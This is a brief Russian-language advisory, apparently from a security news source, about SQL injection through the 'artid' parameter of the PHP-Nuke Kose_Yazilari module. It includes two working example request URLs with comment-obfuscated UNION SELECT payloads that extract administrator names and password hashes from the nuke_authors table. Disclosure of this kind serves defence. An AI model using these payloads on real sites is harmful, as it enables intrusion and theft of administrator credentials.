Хакер #305. Многошаговые SQL-инъекции
Программа: PHP-Nuke Module Kose_Yazilari
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «artid» сценарием modules.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344 %2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F 0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999 %2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A %2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors